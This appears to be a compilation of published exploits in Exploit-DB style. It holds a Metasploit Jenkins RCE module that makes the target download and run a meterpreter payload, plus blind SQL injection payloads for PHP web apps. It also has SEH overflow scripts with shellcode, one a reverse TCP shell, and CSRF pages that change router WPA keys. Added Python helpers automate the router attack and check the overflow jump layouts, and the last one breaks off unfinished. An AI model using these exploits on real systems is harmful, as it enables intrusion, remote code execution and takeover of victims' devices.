        Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
      },
      'Author'         => [
        'Orange Tsai', # Discovery and PoC
        'wvu'          # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-1003000'], # Script Security
        ['CVE', '2019-1003001'], # Pipeline: Groovy
        ['CVE', '2019-1003002'], # Pipeline: Declarative
        ['EDB', '46427'],
        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],
        ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']
      ],
      'DisclosureDate' => '2019-01-08', # Public disclosure
      'License'        => MSF_LICENSE,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',
          'Version'    => Gem::Version.new('2.137')
        ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
      'Notes'          => {
        'Stability'    => [CRASH_SAFE],
        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
        'Reliability'  => [REPEATABLE_SESSION]
      },
      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])

    deregister_options('URIPATH')
  end

=begin
  http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
=end
  def check
    checkcode = CheckCode::Safe

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => go_go_gadget1('/search/index'),
      'vars_get' => {'q' => 'a'}
    )

    unless res && (version = res.headers['X-Jenkins'])
      vprint_error('Jenkins not detected')
      return CheckCode::Unknown
    end

    vprint_status("Jenkins #{version} detected")
    checkcode = CheckCode::Detected

    if Gem::Version.new(version) > target['Version']
      vprint_error("Jenkins #{version} is not a supported target")
      return CheckCode::Safe
    end

    vprint_good("Jenkins #{version} is a supported target")
    checkcode = CheckCode::Appears

    if res.body.include?('Administrator')
      vprint_good('ACL bypass successful')
      checkcode = CheckCode::Vulnerable
    else
      vprint_error('ACL bypass unsuccessful')
      return CheckCode::Safe
    end

    checkcode
  end

  def exploit
    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    # NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS
    # HACK: Both HttpClient and HttpServer use datastore['SSL']
    ssl = datastore['SSL']
    datastore['SSL'] = false
    start_service('Path' => '/')
    datastore['SSL'] = ssl

    print_status('Sending Jenkins and Groovy go-go-gadgets')
    send_request_cgi(
      'method'   => 'GET',
      'uri'      => go_go_gadget1,
      'vars_get' => {'value' => go_go_gadget2}
    )
  end

  #
  # Exploit methods
  #

=begin
  http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
  ?apiUrl=http://169.254.169.254/%23
  &login=orange
  &password=tsai
=end
  def go_go_gadget1(custom_uri = nil)
    # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username
    acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')

    return normalize_uri(acl_bypass, custom_uri) if custom_uri

    normalize_uri(
      acl_bypass,
      '/descriptorByName',
      '/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
    )
  end

=begin
  http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
  ?value=
  @GrabConfig(disableChecksums=true)%0a
  @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
  @Grab(group='tw.orange', module='poc', version='1')%0a
  import Orange;
=end
  def go_go_gadget2
    (
      <<~EOF
        @GrabConfig(disableChecksums=true)
        @GrabResolver('http://#{srvhost_addr}:#{srvport}/')
        @Grab('#{vendor}:#{app}:#{version}')
        import #{app}
      EOF
    ).strip
  end

  #
  # Payload methods
  #

  #
  # If you deviate from the following sequence, you will suffer!
  #
  # HEAD /path/to/pom.xml     -> 404
  # HEAD /path/to/payload.jar -> 200
  # GET  /path/to/payload.jar -> 200
  #
  def on_request_uri(cli, request)
    vprint_status("#{request.method} #{request.uri} requested")

    unless %w[HEAD GET].include?(request.method)
      vprint_error("Ignoring #{request.method} request")
      return
    end

    if request.method == 'HEAD'
      if request.uri != payload_uri
        vprint_error('Sending 404')
        return send_not_found(cli)
      end

      vprint_good('Sending 200')
      return send_response(cli, '')
    end

    if request.uri != payload_uri
      vprint_error('Sending bogus file')
      return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
    end

    vprint_good('Sending payload JAR')
    send_response(
      cli,
      payload_jar,
      'Content-Type' => 'application/java-archive'
    )

    # XXX: $HOME may not work in some cases
    register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")
  end

  def payload_jar
    jar = payload.encoded_jar

    jar.add_file("#{app}.class", exploit_class)
    jar.add_file(
      'META-INF/services/org.codehaus.groovy.plugins.Runners',
      "#{app}\n"
    )

    jar.pack
  end

=begin javac Exploit.java
  import metasploit.Payload;

  public class Exploit {
      public Exploit(){
          try {
              Payload.main(null);
          } catch (Exception e) { }

      }
  }
=end
  def exploit_class
    klass = Rex::Text.decode_base64(
      <<~EOF
        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB
        AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq
        YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl
        Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n
        L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q
        twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
        AAAA
      EOF
    )

    # Replace length-prefixed string "Exploit" with a random one
    klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")
  end

  #
  # Utility methods
  #

  def payload_uri
    "/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"
  end

  def vendor
    @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join
  end

  def app
    @app ||= Faker::App.name.split(/[^[:alpha:]]/).join
  end

  def version
    @version ||= Faker::App.semantic_version
  end

end
            
# Exploit Title: Netartmedia Php Dating Site - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/datingsite/
# Demo Site: https://www.phpscriptdemos.com/dating/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
# Description: PHP Dating Site is a complete web system for creating
advanced and modern online dating websites.

 ----- PoC SQLi -----

Request: http://localhost/[PATH]/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
            
# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/jobsportal/
# Demo Site: https://www.ittjobs.com/
# Version: 6.1
# Tested on: Kali Linux
# CVE: N/A

----- PoC SQLi -----

Request: http://localhost/[PATH]/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
            
===========================================================================================
# Exploit Title: 202CMS - 'log_user' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is a small but functional CMS. It is based
on Twitter Bootstrap. This CMS was built by Konrad and is powered by MySQLi
and PHP. 202CMS is highly customizable and extremely easy to set up. The
script is not finished, but soon I'm going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : log_user
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/202cms10beta/index.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: 202CMS - 'register.php' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is a small but functional CMS. It is based on Twitter Bootstrap.
  This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is highly customizable
  and extremely easy to set up. The script is not finished, but soon I'm going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : register.php, reg_user,reg_mail
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
# POST Method : http://localhost/202cms10beta/register.php
===========================================================================================
            
# Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpbusinessdirectory.com/
# Demo Site: https://www.bizwebdirectory.com/
# Version: 4.2
# Tested on: Kali Linux
# CVE: N/A
 ----- PoC SQLi -----

Request: http://localhost/[PATH]/USERS/loginaction.php
Parameter: Email (POST)
Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
            
# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
# Date: 2019-03-19
# Vendor Homepage: http://netsharewatcher.nsauditor.com
# Software Link:  http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Exploit Author: Peyman Forouzan
# Tested Version: 1.5.8.0
# Tested on: Windows XP SP2 - SP3

# 1- Run the Python script: NetShareWatcher.py
# 2- Open Exploit.txt and copy its content to the clipboard
# 3- Open NetShareWatcher
# 4- Settings --> Defaults --> Restrictions --> Add --> Custom
# 5- Paste the content of Exploit.txt into the box
# 6- Click 'Find'
# 7- calc.exe opens (the calc payload can be replaced with other shellcode)

#!/usr/bin/env python3

buffer = b"\x41" * 262
nseh = b"\xeb\x14\x90\x90"  # Overwrite next SEH with a short jmp (+20) that lands in the NOP sled
seh = b"\x90\xBF\xC9\x74"   # Overwrite SEH handler with pop esi / pop ebx / retn [OLEACC.dll]
nops = b"\x90" * 20

# Calc.exe payload [size 227]
buf = b""
buf += b"\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9"
buf += b"\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92"
buf += b"\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84"
buf += b"\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e"
buf += b"\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1"
buf += b"\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27"
buf += b"\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb"
buf += b"\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b"
buf += b"\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2"
buf += b"\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37"
buf += b"\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3"
buf += b"\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef"
buf += b"\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb"
buf += b"\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf"
buf += b"\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83"
buf += b"\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3"
buf += b"\x9a\xca\xc0"

# Layout: 262 bytes of filler, then nSEH, then SEH, then the sled the short jmp lands in, then the payload
payload = buffer + nseh + seh + nops + buf
try:
    # Write as bytes: a text-mode write would re-encode every byte above 0x7f
    with open("Exploit.txt", "wb") as f:
        print("[+] Creating %d bytes payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except OSError as e:
    print("File can't be created: %s" % e)
            
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery (CSRF)
# Date: 14/01/2019
# Exploit Author: Kumar Saurav
# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Windows
# CVE : CVE-2019-6282

#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware W2001EN-00
have a CSRF vulnerability via the cgi-bin/webproc?getpage=html/index.html subpage=wlsecurity URI,
allowing an attacker to change the wireless security password.

#Reproduction Steps:

Note: This enables an attacker to perform an unwanted action on a wireless router to which the user/admin is currently authenticated.

Step 1: The user logs in to the PLC wireless router.

Step 2: The user visits the attacker's malicious web page (PLC_CSRF.html).

Step 3: PLC_CSRF.html exploits the CSRF vulnerability and changes the wireless security (WPA/WPA2) key to "PSWDmatlo331#@!".

Step 4: PLC_CSRF.html (the router address is 192.168.59.254 in my case):

<html>
<body>
  <form method="POST" action="http://192.168.59.254:80/cgi-bin/webproc">
    <input type="text" name="sessionid" value="2a39a09e">
    <input type="text" name="language" value="en_us">
    <input type="text" name="sys_UserName" value="admin">
    <input type="text" name="var:menu" value="setup">
    <input type="text" name="var:page" value="wireless">
    <input type="text" name="var:subpage" value="wlsecurity">
    <input type="text" name="var:errorpage" value="wlsecurity">
    <input type="text" name="getpage" value="html/index.html">
    <input type="text" name="errorpage" value="html/index.html">
    <input type="text" name="var:arrayid" value="0">
    <input type="text" name="obj-action" value="set">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType" value="11i">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes" value="AESEncryption">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode" value="PSKAuthentication">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey" value="100">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase" value="PSWDmatlo331#@!">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression" value="KeyPassphrase">
    <input type="submit" value="Send">
  </form>
</body>
</html>
            
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control
# Date: 14/01/2019
# Exploit Author: Kumar Saurav
# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Windows
# CVE : CVE-2019-6279

#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware W2001EN-00
have an Incorrect Access Control vulnerability via the cgi-bin/webproc?getpage=html/index.html
subpage=wlsecurity URI, allowing an attacker to change the wireless security password.

Reproduction Steps:
Step 1: Build a malicious HTML web page.
Step 2: The attacker wants to change the wireless security (WPA/WPA2) key to
"PSWDmatlo331#@!" (in my case).

Step 3: The page (the router address is 192.168.59.254 in my case):
<html>
<body>
<form method="POST" action="http://192.168.59.254:80/cgi-bin/webproc">
<input type="text" name="sessionid" value="2a39a09e">
<input type="text" name="language" value="en_us">
<input type="text" name="sys_UserName" value="admin">
<input type="text" name="var:menu" value="setup">
<input type="text" name="var:page" value="wireless">
<input type="text" name="var:subpage" value="wlsecurity">
<input type="text" name="var:errorpage" value="wlsecurity">
<input type="text" name="getpage" value="html/index.html">
<input type="text" name="errorpage" value="html/index.html">
<input type="text" name="var:arrayid" value="0">
<input type="text" name="obj-action" value="set">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType" value="11i">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes" value="AESEncryption">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode" value="PSKAuthentication">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey" value="100">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase" value="PSWDmatlo331#@!">
<input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression" value="KeyPassphrase">
<input type="submit" value="Send">
</form>
</body>
</html>

Step 4: Save this as Incorrect_Access_Control.html.
Step 5: Plant the malicious web page (Incorrect_Access_Control.html) where the
victim is likely to visit it (by social engineering); any user connected to the
access point (AP) who visits the page, or any attacker connected to the AP, will
trigger this exploit.
Step 6: After the exploit executes, the wireless security (WPA/WPA2) key will
change!!

Note: This vulnerability allows an attacker to reproduce the change without logging in.
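The two advisories above share one request: a POST to cgi-bin/webproc with obj-action=set and the TR-069-style WLANConfiguration parameter names. The following Python script is an added example, not the advisory author's code, that builds that request from the PoC form fields, emits an auto-submitting CSRF page (the PoC needs a button click; a real attack page submits itself on load), and can also send the POST directly, which is the unauthenticated path the second advisory reports. The router address, session id and sys_UserName are the literal values from the PoC forms; since the second advisory says the change is applied without a login, the session id is not expected to matter, but that is the device's behaviour as reported on the page, not something verified here.

```python
import html
import urllib.parse
import urllib.request

# Values from the advisory's PoC form; adjust ROUTER to the target under test.
ROUTER = "http://192.168.59.254:80/cgi-bin/webproc"
WLAN = ":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1."  # parameter prefix used by the form


def wlsecurity_set_fields(passphrase, sessionid="2a39a09e", username="admin"):
    """The exact field set the PoC form submits; only the passphrase is meant to vary."""
    return {
        "sessionid": sessionid,
        "language": "en_us",
        "sys_UserName": username,
        "var:menu": "setup",
        "var:page": "wireless",
        "var:subpage": "wlsecurity",
        "var:errorpage": "wlsecurity",
        "getpage": "html/index.html",
        "errorpage": "html/index.html",
        "var:arrayid": "0",
        "obj-action": "set",
        WLAN + "BeaconType": "11i",
        WLAN + "IEEE11iEncryptionModes": "AESEncryption",
        WLAN + "IEEE11iAuthenticationMode": "PSKAuthentication",
        WLAN + "X_TWSZ-COM_WPAGroupRekey": "100",
        WLAN + "PreSharedKey.1.KeyPassphrase": passphrase,
        WLAN + "X_TWSZ-COM_PSKExpression": "KeyPassphrase",
    }


def encode_body(fields):
    """application/x-www-form-urlencoded body; '#', '@' and '!' in the passphrase get percent-encoded."""
    return urllib.parse.urlencode(fields).encode()


def decode_body(body):
    """Inverse of encode_body, used to check what the device will actually receive."""
    return {k: v[0] for k, v in urllib.parse.parse_qs(body.decode()).items()}


def csrf_page(action, fields):
    """Auto-submitting variant of the PoC page: the form posts as soon as the victim loads it."""
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s">'
        % (html.escape(k, quote=True), html.escape(v, quote=True))
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        '  <form method="POST" action="%s">\n%s\n  </form>\n'
        "</body></html>\n" % (html.escape(action, quote=True), inputs)
    )


def push_wlsecurity(action, fields, timeout=10):
    """Direct POST without any prior login (the incorrect-access-control path); returns the HTTP status."""
    req = urllib.request.Request(action, data=encode_body(fields), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    fields = wlsecurity_set_fields("PSWDmatlo331#@!")
    print(csrf_page(ROUTER, fields))
```

Running the script prints the CSRF page; call push_wlsecurity(ROUTER, fields) from a host on the AP to reproduce the unauthenticated change, then confirm it by checking whether the old WPA key still associates.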
            
# Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/dealsportal/
# Demo Site: https://www.phpscriptdemos.com/deals/i
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/loginaction.php
# Vulnerable Parameter: Email (POST)
# Attack Pattern:
Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
            
# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
# Demo Site: https://www.phpscriptdemos.com/vlogs/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/index.php
# Vulnerable Parameter: email (POST)
# Attack Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password
            
#!/usr/bin/env python

# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Version: 5.5.3.8 and above
# Tested on: Windows 7 Professional SP1 x86
# CVE : CVE-2018-9128
# Similar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438
#   On Windows 7 the SEH handler address used here contains a \x00 byte, which
#   has to be obtained by way of a restricted char. For that reason every jump
#   has to go backward, toward the beginning of the shellcode placed before it.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode

shellcode = b""
shellcode += b"\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
shellcode += b"\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
shellcode += b"\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
shellcode += b"\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
shellcode += b"\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
shellcode += b"\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
shellcode += b"\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
shellcode += b"\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
shellcode += b"\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
shellcode += b"\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
shellcode += b"\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
shellcode += b"\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
shellcode += b"\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
shellcode += b"\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
shellcode += b"\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
shellcode += b"\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
shellcode += b"\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
shellcode += b"\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
shellcode += b"\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
shellcode += b"\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
shellcode += b"\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
shellcode += b"\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
shellcode += b"\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
shellcode += b"\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
shellcode += b"\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
shellcode += b"\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
shellcode += b"\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
shellcode += b"\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
shellcode += b"\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
shellcode += b"\x6b\xc2\x36"

# 600 bytes in total: NOP sled first, shellcode at the end, so a backward jump lands in the sled
junk = b"\x90" * (600 - len(shellcode))
junk += shellcode

# nasm > jmp $-400
# 00000000  E96BFEFFFF        jmp 0xfffffe70
backflip = b"\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
junk += backflip

# nSEH: short jmp -10, back onto the backflip above
junk += b"\xeb\xf6\x90\x90"
# SEH: 00401838  |. 5E             POP ESI
# the address's null byte is supplied through the restricted char \x1a (see the note above)
junk += b"\x38\x18\x40\x1a"

# Write as bytes so no byte of the payload is re-encoded on the way to disk
with open("evil_playlist.plf", "wb") as file:
    file.write(junk)
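Both the NetShareWatcher and the DVD X Player exploits above are classic nSEH/SEH overwrites whose correctness hinges on two hand-computed relative jumps and on the handler address not containing a restricted byte. The helper below is an added example, not code from either exploit author: it encodes EB/E9 jumps, decodes where a jump at a given offset lands, and rebuilds both payload layouts (with int3 placeholders standing in for the shellcode) so the landing offsets and the handler bytes can be checked before the file is ever fed to the target. The 0x00/0x0a/0x1a/0x0d bad-char set is the one from the DVD X Player msfvenom command; everything else is derived from the two scripts.

```python
import struct

# Bad-char set from the DVD X Player msfvenom command above.
BADCHARS = b"\x00\x0a\x1a\x0d"


def short_jmp(rel):
    """EB rel8; rel is counted from the end of the 2-byte instruction."""
    return b"\xeb" + struct.pack("<b", rel)


def near_jmp(rel):
    """E9 rel32; rel is counted from the end of the 5-byte instruction."""
    return b"\xe9" + struct.pack("<i", rel)


def jmp_target(payload, offset):
    """Decode the jmp at `offset` and return the payload offset it lands on."""
    op = payload[offset]
    if op == 0xEB:
        return offset + 2 + struct.unpack_from("<b", payload, offset + 1)[0]
    if op == 0xE9:
        return offset + 5 + struct.unpack_from("<i", payload, offset + 1)[0]
    raise ValueError("no jmp opcode at offset %d" % offset)


def seh_record(payload, nseh_off):
    """For an nSEH/SEH overwrite at nseh_off: (offset the nSEH jmp lands on, handler address)."""
    handler = struct.unpack_from("<I", payload, nseh_off + 4)[0]
    return jmp_target(payload, nseh_off), handler


def bad_char_positions(data, badchars=BADCHARS):
    """(index, byte) for every restricted byte in data; empty list means the bytes are clean."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def netsharewatcher_layout(shellcode=b"\xcc" * 227):
    """Same layout as NetShareWatcher.py: 262 filler, nSEH, SEH, 20-byte sled, payload."""
    p = b"A" * 262 + short_jmp(20) + b"\x90\x90" + b"\x90\xbf\xc9\x74" + b"\x90" * 20 + shellcode
    target, handler = seh_record(p, 262)
    return {
        "target": target,
        "jmp_lands_in_sled": 270 <= target < 290,   # sled occupies offsets 270..289
        "handler": handler,
        "handler_bad_chars": bad_char_positions(p[266:270]),
    }


def dvdx_layout(shellcode=b"\xcc" * 351):
    """Same layout as evil_playlist.plf: 600-byte sled+shellcode, backflip, nSEH, SEH."""
    p = b"\x90" * (600 - len(shellcode)) + shellcode + b"\x90" * 3 + near_jmp(-405)
    p += short_jmp(-10) + b"\x90\x90" + b"\x38\x18\x40\x1a"
    nseh_target, handler = seh_record(p, 608)
    return {
        "nseh_target": nseh_target,               # should hit the backflip's leading NOPs at 600
        "backflip_target": jmp_target(p, 603),    # should land inside the sled, before the shellcode
        "backflip_in_sled": 0 <= jmp_target(p, 603) < 600 - len(shellcode),
        "handler": handler,
        "handler_bad_chars": bad_char_positions(p[612:616]),
    }


if __name__ == "__main__":
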